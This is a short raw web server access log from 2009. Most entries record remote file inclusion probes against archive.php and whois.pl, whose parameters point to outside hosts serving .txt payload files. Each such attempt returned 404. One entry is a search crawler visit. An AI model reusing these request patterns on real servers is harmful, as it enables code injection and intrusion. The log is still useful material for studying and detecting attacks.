61.63.4.74 - - [07/Sep/2009:07:07:41 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.63.4.74 - - [07/Sep/2009:07:07:41 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.63.4.74 - - [07/Sep/2009:07:07:42 -0500] "GET /logs/access_log.1236211200/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.207.26 - - [07/Sep/2009:07:09:02 -0500] "GET /logs/access_log.1106524800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.174.78.83 - - [07/Sep/2009:07:11:13 -0500] "GET /logs/access_log.1244764800//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:07:11:13 -0500] "GET /logs//cgi-bin/whois.pl?queryinput=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
